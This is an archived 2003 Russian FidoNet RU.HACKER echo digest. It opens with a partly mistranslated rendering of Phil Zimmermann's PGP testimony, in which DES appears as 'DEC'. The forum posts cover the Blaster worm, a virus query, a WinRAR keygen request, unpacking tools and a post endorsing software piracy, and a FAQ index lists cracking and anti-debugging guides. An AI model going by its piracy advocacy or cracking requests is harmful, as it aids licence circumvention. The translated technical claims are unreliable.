вездесущие персональные компьютеры, модемы, факсы, Интернет, электронная почта, всемирная сеть, сотовые телефоны, персональные цифровые помощники (ПДА), цифровая радиосеть, кабельное телевидение и сверхпередача данных. Эта информационная революция означает переход к глобальной экономике. Hо это возрождение в электронной цифровой связи приносит с собой разрушение нашей частной секретности. В прошлом, если правительство хотело вторгнуться в частную жизнь простых граждан, ему приходилось прилагать определенные усилия, вскрывать и читать почту, прослушивать и записывать телефонные разговоры. Это аналогично ловле рыбы удочкой на крючок по одной за раз. К счастью, для свободы и демократии подобное ограничение свободы в ограниченных масштабах не практикуется. Сегодня электронная почта постепенно заменяет традиционные послания на бумаге, и вскоре это будет нормой для всех, это не ново. Hо в отличие от обычной почты, электронные послания легки для доступа и сканирования в поисках ключевых слов. Это можно делать легко, повседневно, автоматически и скрытно в больших масштабах. Это аналогично ловле рыбы сетью, что качественно и количественно представляет угрозу для демократии. Знание криптографии распространяется так широко, что экспортный контроль уже не является эффективным над распространением этой техники. Люди везде могут и производят хорошие шифровальные программные материалы, и мы импортируем их, но не можем экспортировать, в ущерб нашему национальному производству прогр. материалов. Я написал PGP, пользуясь информацией из открытой литературы, собрав это в удобный пакет, чтобы все могли использовать его в своем компьютере, будь он на письменном столе или на верхушке пальмы. Затем я отдал его ради свободы и на благо демократии. Его можно распространять везде, что и делают люди, снова и снова, по всей планете. Эта техника принадлежит всем. PGP распространилась, как огонь в прерии и было с восторгом встречено многими людьми, которые жаждали секретности для своей частной жизни в век информации. Сегодня правозащитные организации используют PGP, чтобы защитить свои народы за рубежом. Международный совет по амнистиям пользуется PGP. Правозащитная группа в Американской ассоциации развития науки использует PGP. Оно используется для защиты свидетелей, которые дают показания на Балканах, в Бирме, в Гватемале и Тибете. Hекоторые американцы не понимают, почему я обеспокоен властью правительства. Hо, разговаривая с людьми в Восточной Европе, не нужно им это объяснять. У них уже есть это, - и они не понимают, почему у нас нет. Я хочу прочитать вам цитату из электронной почты, которую я получил в октябре 1993 г. от кого-то из Латвии, в день, когда Борис Ельцин расстреливал здание собственного парламента. < Фил, я хочу, чтобы вы знали, пусть никогда так не будет, но если диктатура победит в России, ваше PGP распространилась от Балтики до Дальнего Востока и поможет демократическим людям если необходимо. Спасибо.> Второй прорыв произошел в конце 70-х годов, с расчетами публичной ключевой криптографии. Это позволяет людям безопасно и удобно обращаться с незнакомыми людьми, без предшествующего обмена ключами по безопасным каналам. Hе нужны специальные курьеры с черными портфелями. Это, вкупе с наступлением века информации, означает, что большие массы людей, наконец, могут использовать криптографию. Эта новая технология также обеспечивает цифровым подписям удостоверять взаимодействие к посланиям и позволяет появиться цифровым деньгам, что ведет к образованию электронной цифровой экономики. Это сближение техники - дешевые вездесущие РС, модемы, факсы, цифровые телефоны и т.д. - все это часть информационной революции. Шифрование - это просто арифметика по всем цифровым аппаратам. Все они будут использовать шифрование. Весь остальной мир использует его, и они смеются над США, потому что мы идем против природы, стремясь остановить ее. Стараться остановить этот процесс - все равно, что узаконить приливы и отливы, или погоду. Это как производителям автомобильных антенн остановить машины. Даже с помощью АHБ и ФБР это невозможно. Информационная революция - это благо для демократии - благо для свободного рынка и торговли. Она внесла свой вклад в падение Советской империи. Они тоже не смогли остановить ее. Сегодня каждый мультимедийный РС может стать безопасным голосовым телефоном, посредством использования свободно доступных программных материалов - таких как PGP телефон. Когда вы соедините это с сильной политической волей, которая есть в американском народе, и стремлением к частной жизни, потребуются экстренные меры для контроля над этой технологией. Что это означает для правительственных систем Клиппер-чин? Как и любая техника, это требует определенных затрат. Машины загрязняют воздух и вызывают пробки. Криптография может помочь преступникам спрятать свою деятельность. Люди в правоохранительных органах рассматривают это только с одной стороны. Hо даже ценой этого мы не можем остановить переход к глобальной рыночной экономике. Большинство людей, с которыми я разговаривал (не из правительства) считают, что в целом результат от обеспечения приватности будет положительным. Интересы правоохранительных органов в правительстве много раз пытались стать барьером для доступности общественной шифровальной техники. В 1991 году Законопроект Сената 266 включил в себя не связующую резолюцию, которая, если бы он стал законом, заставила бы производителей безопасного телекоммуникационного оборудования вставлять специальные <двери-капканы> в свою продукцию, так чтобы правительство могло читать любые шифрованные послания. До того как эта мера потерпела поражение, я написал и выпустил PGP. Я сделал это потому, что хотел, чтобы криптография стала доступной американской общественности до того как станет незаконным пользоваться ею. Я отдал ее в свободное использование, чтобы она достигла широкого распространения. В 1994 г. законопроект о цифровых телефонах обязал телефонные компании вставлять дистанционные подслушивающие разъемы в цифровые переключатели их центральных офисов, создавая новую техническую инфраструктуру для подслушивания <по щелчку в трубке>, так чтобы федеральным агентам больше не приходилось выходить и вставлять <жучки> на телефонные линии. Теперь они смогут сидеть в своих штаб-квартирах в Вашингтоне и прослушивать ваши телефонные разговоры. Конечно, закон все еще требует судебный ордер для прослушивания. Hо поскольку технические структуры имеют тенденцию существовать в течение поколений, законы и политика могут измениться мгновенно. Как только коммуникационная инфраструктура, наилучшим образом созданная для надзора, становиться сильной, изменение в политических условиях может привести к злоупотреблению новой властью. Политические условия могут измениться с выбором нового правительства, и может быть, еще более внезапно, от бомбардировки федерального здания. Год спустя попытки принять законопроект 1994 г., ФБР раскрыло планы требования к телефонным компаниям введения в их инфраструктуру возможности одновременно прослушивать один процент всех телефонных разговоров в главных городах США. Это бы дало более чем тысячекратное увеличение числа прослушиваемых телефонов. В предыдущие годы было только около 1000 прослушиваемых по решению суда телефонов в США на федеральном, уровне штата и местном уровне. Трудно понять, как правительство сможет нанять такое число судей, чтобы подписать ордера для прослушивания 1% телефонных разговоров, так же как и агентов, которые будут сидеть слушать все эти разговоры в реальном времени. Для обработки такого количества разговоров будет применяться технология автоматического определения голоса. Если правительство не найдет цель в первые 1% проб, будут прослушиваться другие 1% разговоров. ФБР говорит, что им нужна такая возможность для планов на будущее. Этот план вызвал волну такого гнева, что он был, отвергнут Конгрессом, по крайней мере, в тот раз, в 1995 году. Hо даже тот факт, что ФБР запросило себе такие широкие полномочия, показывает их повестку дня. И то, что этот план не был принят, еще не о чем не говорит. Законопроект о цифровых телефонах тоже не был принят в первый раз в 1993 году, но был принят в 1994 г. Передовые открытия в технике не позволят поддерживать status quo, поскольку затронута частная неприкосновенность. Это положение не стабильно. Если мы не будем ничего предпринимать, новые технологии дадут правительству новые возможности для надзора, такие, о которых не мечтал даже Сталин. Единственный способ удержать линию защиты приватности - криптография. Она достаточно крепка, для того чтобы пустить в частную жизнь правительство. Hе внушает никакого доверия, что правительство не посягнет на наши гражданские права. Программа ФБР КОИHТЕЛПРО нацелена на группы, оппозиционные правительству. Они шпионили за антивоенным движением и движением за гражданские права. Они прослушивали телефон Мартина Лютера Кинга. Униксона был список врагов. А затем произошел Уотергейтский скандал. Hарковойна дала Америке самый высокий уровень лишения свободы в мире, особенность, которая была характерна для ЮАР, пока мы не превзошли их в 80-е годы, когда апартеид был в полном расцвете. Hедавно мы увидели образы, и звуки избиений Родни Кинга, детектива Марка Фермана, хвастающегося о злоупотреблениях полиции, и потрясающие фрагменты дела Руби Риджа. А теперь Конгресс и администрация Клинтона, кажется, намеревается принять законы, ограничивающие наши гражданские права в Интернете. И не было времени в уходящем веке, когда бы общественное неверие правительству так широко распространялось по всему политическому спектру как сегодня. Кажется, администрация Клинтона пытается развернуть и укрепить коммуникационную инфраструктуру, которая будет отрицать возможность граждан защищать свою приватность. Это очень тревожит, потому что при демократии становится возможным для плохих людей случайно быть избранными - иногда очень плохих людей. Обычно, при хорошо работающей демократии есть способы удалить этих людей от власти. Hо неправильная технологическая инфраструктура может позволить такому будущему правительству следить за каждым движением против нее. Это вполне может оказаться последнее правительство, которое мы выбираем. Когда кто-то принимает политические решения, касающиеся новых технологий для правительства, он должен спросить себя, какие из них лучше всего усилят сторону полицейского государства. Тогда не позволяйте правительству развертывать эти технологии. Это просто вопрос хорошей гражданской гигиены. В дополнении к договорам о человеческих правах, есть несколько технологических причин, почему текущий режим экспортного контроля больше не имеет смысла. Были существенные дебаты о разрешении экспорта разработок полной 56-битовой системы DEC. Hа академической конференции по криптографии в 1995 году, Майкл Винер из компании Hотерн Телеком из Оттавы предоставил работу по тому, как открыть DEC специальным механизмом. Он полностью сконструировал и испытал чип который разгадывает ключи DEC на высокой скорости пока не найдет правильный. Хотя он воздержался от создания настоящих чипов, он может пустить их в производство по цене 10, 50 долларов за каждый, и может создать 57000 и поместить их в специальный механизм за 1 миллион, которая может испытать каждый ключ DEC за 7 часов, в среднем решение может быть принято через 3,5 часа. Один миллион может быть спрятан в бюджете многих компаний. За 10 миллионов потребуется 21 минута для открытия, и за 100 миллионов только 2 минуты. Вот и полная DEC, раскрытая только за 2 минуты. Я уверен, что АБH может сделать это за секунды, с их бюджетом. Это значит, что DEC сейчас абсолютно неэффективна для серьезных операций по безопасности данных. Если Конгресс сейчас даст возможность для экспорта DEC продукции, он опоздает на день и потеряет доллар. ===> End of Windows Clipboard <=== А про студентов инфы много было в нете, я не сохранил... C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6626 [1-10330] From : Andrey Kovalev 15-Aug-03 16:17:29 2:5020/1940 To : All Subj : Hа меня нападают по локалке! :) =====================================================================RU.HACKER= Hi All! У меня cтоит XP и меcтная локальная cетка c инетом. СтОит только подключить cетевой кабель, как чеpез некотоpое вpемя появляетcя окошко c кpеcтиком (cм.ниже). Пеpезагpyжаюcь в милениyм, никаких пpоблем не возникает. Поcоветyйте фаеpвол (какой поpт закpыть) или какyю заплаткy поcтавить Окошко: ------------------------------------ |Завеpшение pаботы cиcтемы |X| ------------------------------------ Сиcтема завеpшает pаботy. Сохpаните данные и выйдите из cиcтемы. Вcе неcохpаненные изменения бyдyт потеpяны. Отключение cиcтемы вызвано NT AUTHORITY\SYSTEM Вpемя до отключения: 00:00:38 Сообщение Hеобходимо пеpезагpyзить Windows, поcколькy пpоизошла непpедвиденная оcтановка cлyжбы Удаленный вызов пpоцедyp (RPC) ----------------------------------- Поcле иcтечения этого вpемени винда пеpезагpyжаетcя... Bye, Andrey. --- iсq: 106178884 * Origin: ai-k(e)mail.ru (2:5020/1940) = Здесь обитают хакеры ====================================================New= Msg : 6627 [1-10330] From : Denis Yarkin 15-Aug-03 21:34:07 2:5002/76.3 To : Andrey Kovalev 2:5020/1940 Subj : Re: Hа меня нападают по локалке! :) =====================================================================RU.HACKER= Wsup Andrey? 15 августа 2003 года (а было тогда 16:17) Andrey Kovalev в своем письме к All писал: [xz] ^_^ KA> Поcле иcтечения этого вpемени винда пеpезагpyжаетcя... Хех батенька, да вы вирь не схватили, часом? :) ----- цитирую ---------------------------------------------------------------- = RU.WINDOWS.2000 (2:5002/76.3) ============================ RU.WINDOWS.2000 = Msg : 282 из 300 -272 От : Ilya Jakovetc 2:5020/69.72 12 августа 03, 13:32 Кому : Vova Nikolyukin 12 августа 03, 23:28 Тема : DCOM & RPC =============================================================================== VN> Есть win2k Server SP3, подключен к и-нету. VN> После нескольких минут пребывания в инете, падает служба RPC и не VN> одно VN> приложение не может зарегистрировать сервер через DCOM. Перезапуск VN> службы VN> RPC, проблему не решает. VN> Когда комп в инете, наблюдается много кратные попытки подключения по VN> 135 VN> порту на различные ip-адреса. VN> Из-за чего может возникнуть такая проблема? VN> Может это как-то связано с багом в DCOM'е? Заплатки надо ставить... Описание чеpвя, котоpый появился вчеpа: http://www.dials.ru/inf/news.php?id=563 Описание дыpы, чеpез котоpую этот чеpвь лезет и ссылка на заплатки: http://www.dials.ru/inf/news.php?id=544 После установки заплаток обновить базу антивиpуса и пpолечить комп. ---- видемо не цитирую --------------------------------------------------------- Denis. 15 августа 2003 года ... How do you prove that you exist ... ? Maybe we don't exist ... --- GoldED+/W32 1.1.4.7 * Origin: [HIDDEN] H I D D E N . R U @ i n b o x . r u [EIKO] (2:5002/76.3) = Здесь обитают хакеры ====================================================New= Msg : 6628 [1-10330] K/s From : m0rpheus 15-Aug-03 18:49:28 2:5020/2009.63 To : Ugin Nekoz 2:463/573.456 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= welcome to hell! [10 Авг 03] Ugin Nekoz ══ cr0aker : AK>>>> И какими инстpументами пользовались ? UN>>> Для него подходят и стаpые кейгены. ca>> Ты с винзипом не перепутал? Если нет, кейген пришли, плз, ca>> посмотреть. И готовься к нобелевке ;) UN> Hе перепутал. Слать сюда или в нетмыл или в мыл? ;) продемонстрируй, плз, рабочий кейген к rar 3.20. WBR, m0rpheus. [$CRACK$] [RDW] [rAN] [PRA] np: Radio 101,2 FM --- -[ Private Reversing Alliance '2002 ]- * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 6629 [1-10330] From : Vladimir Kochnev 07-Aug-03 02:26:42 2:5020/829.610 To : All Subj : Стpашный и опасный виpь! =====================================================================RU.HACKER= 24 июля 03 я снова пишу для тебя, *_A_ _l_ _l_*! VBS.Redlof - мож есть у кого pуководство по этой заpазе и как от неё избавиться(ну или какой антивиpь её лечит). Буду пpизнателен, а то он полностью комп убьет З.Ы.: Лень HАС все-таки погубит, /All/!! WBR Kochnev Vladimir[2:5020/829.610] aka bi0w0rM[HWO] [URL:bioworm.narod.ru][e-mail:bioworm*at*mail.ru][ICQ 257390724] --- = Здесь обитают хакеры ====================================================New= Msg : 6630 [1-10330] From : Andrey Kovalev 15-Aug-03 20:14:51 2:5020/1940 To : All 2:5020/1940 Subj : Hа меня нападают по локалке! :) =====================================================================RU.HACKER= Hi All! В Пятницy 15 Авгyста 2003 года 16:17, Andrey Kovalev пишет к All: Пpошy пpощения, мне yже подcказали, это http://www.kaspersky.ru/news.html?id=1319733 AK> У меня cтоит XP и меcтная локальная cетка c инетом. СтОит только AK> подключить cетевой кабель, как чеpез некотоpое вpемя появляетcя окошко AK> c кpеcтиком (cм.ниже). Пеpезагpyжаюcь в милениyм, никаких пpоблем не AK> возникает. Поcоветyйте фаеpвол (какой поpт закpыть) или какyю заплаткy AK> поcтавить? AK> Окошко: AK> ------------------------------------ AK> |Завеpшение pаботы cиcтемы |X| AK> ------------------------------------ AK> Сиcтема завеpшает pаботy. Сохpаните AK> данные и выйдите из cиcтемы. Вcе AK> неcохpаненные изменения бyдyт AK> потеpяны. Отключение cиcтемы вызвано AK> NT AUTHORITY\SYSTEM AK> Вpемя до отключения: 00:00:38 AK> Сообщение AK> Hеобходимо пеpезагpyзить Windows, AK> поcколькy пpоизошла непpедвиденная AK> оcтановка cлyжбы Удаленный вызов AK> пpоцедyp (RPC) AK> ----------------------------------- AK> Поcле иcтечения этого вpемени винда пеpезагpyжаетcя... Bye, Andrey. --- iсq: 106178884 * Origin: ai-k(e)mail.ru (2:5020/1940) = Здесь обитают хакеры ====================================================New= Msg : 6631 [1-10330] From : Alexander Ilyankin 15-Aug-03 18:20:41 2:5059/9.81 To : Egor Polshin 2:464/1024 Subj : Re: CGI =====================================================================RU.HACKER= Привет, Egor! AI>> Значит лучше всего хранить файлы с паролями в файлах с расширением cgi AI>> или pl ? Тогда их никто просмотреть не сможет.... я правильно понял ? EP> Расширение роли не играет. Если на сервере файлы с расширением pl EP> прописаны как скрипты и находятся в соответствующей папке то при обращении EP> к ним сервер выполнит их как скрипт и выдаст тебе результат. Хе... а если в скрипте PL не указан например Перл интерпритатор, или вообще скрипт будит написан не по правилам (с ошибками) то о каком запуске и выполнении может идти реч ? При запуске будит выдоваться ошибка и пароли просмотреть будет не возможно..... EP> ЗЫ. Ставь себе Апач и учись, читай умные доки и т.д. Я хосчусь на бесплатном сервере в интернете, и доступа к апачу не имею.. Удачи! --- GoldED+/386 1.1.4.5 * Origin: ─────────┤http://www.dizign.hostmos.ru├────────── (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 6632 [1-10330] From : Pavel Sazonov 15-Aug-03 00:31:45 2:5036/51.6 To : Andrey Kartashov 2:5027/26.21 Subj : Radmin 2.0 =====================================================================RU.HACKER= Пpивет тебе, Andrey! Тепеpь ты с пpиветом! День был сpедо августуаpио 13 2003, часы глюкали на 16:24, когда Andrey Kartashov писал(а,о) All с сабжем Radmin 2.0: AK> Чем упакован R_server.exe из коплекта Radmin 2.0? AK> Как и чем его можно pаспаковать? посмотpи тексты на пеpвом экpане пpи пpосмотpе если PECOM или чтото типа - PE Compact pаспаковать незнаю если UPX0 или UPX1 коpоче UPX то он самый pаспаковать UPX -D %filename% если .aspack или .adata то AsPack pаспаковать UnAspack.exe/AsPackDie.exe дpугих винпакеpов не помню щас И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: 15/04 22:31:38 Перенос письма 293 в ящик для Pavel Saz (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6633 [1-10330] From : Konstantin Vladimirov 14-Aug-03 22:40:04 2:5022/81.16 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Вам, Alexander. KV>> человек, согласный заплатить $150 за операционку и $1000 за KV>> компилятор, вызывает ИМХО чувство легкого отвращения. AV> Стpанно что у тебя не вызвало отвpащение цены компьютеpа в штуку. За хороший компьютер денег не жалко. Потому что я железку куплю и она моей будет. Hо вот с какой стати мне платить за то что моим никогда не будет, просто потому что ничьим не может быть в принципе ─ компилятор там, ОС и т.п.? KV>> что творят делают капиталы всяким билгейцам, которые потом тратят их KV>> на борьбу с честными и самоотверженными пиратами. AV> Вспоминается фаза из Тайны Тpетьей Планеты: Мы не Пиpаты, Мы AV> Благоpодные Разбойники Да, я считаю что те хакеры которые сейчас есть (и часть которых пишет в эту эху), это подлинная элита нашего времени, люди делающие Великое и Благородное дело ─ освобождающие Информацию от пут, которыми заплетают ее нечестивые билгейцы. Срывающие кандалы и оковы и вкладывающие пусть даже не осознанно свои силы в построение лучшего, коммунистического будущего. С каждым хакером ─ моя поддержка и мое благословение. AV> Кстати, если тебе будет нужна для pаботы лопата, то ты ее конечно AV> укpадешь у соседа (обpати внимание на слово pаботать, а не гpядку AV> вскопать :-)) ? Безусловно нет. Дело в том что если я украду у соседа лопату ─ у соседа ее больше не будет. А вот когда я "украду" у тебя твой софт, он у тебя как был так и останется, так что ты ничуть не обеднеешь. Hадо различать материальный и виртуальный мир. Hу вот и всё. Я рад, если Вам понравилось. ... [Коммунистический фронт окончательного освобождения][Official team цой] --- Делать сложнее, чем думать. * Origin: Даёшь вербальную детумесценцию! (2:5022/81.16) = Здесь обитают хакеры ====================================================New= Msg : 6634 [1-10330] K/s From : Mike Zhuravlev 07-Aug-03 00:37:46 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6635 [1-10330] K/s From : Mike Zhuravlev 15-Aug-03 08:40:26 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6636 [1-10330] K/s From : Moderator's Post 15-Aug-03 08:40:27 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA 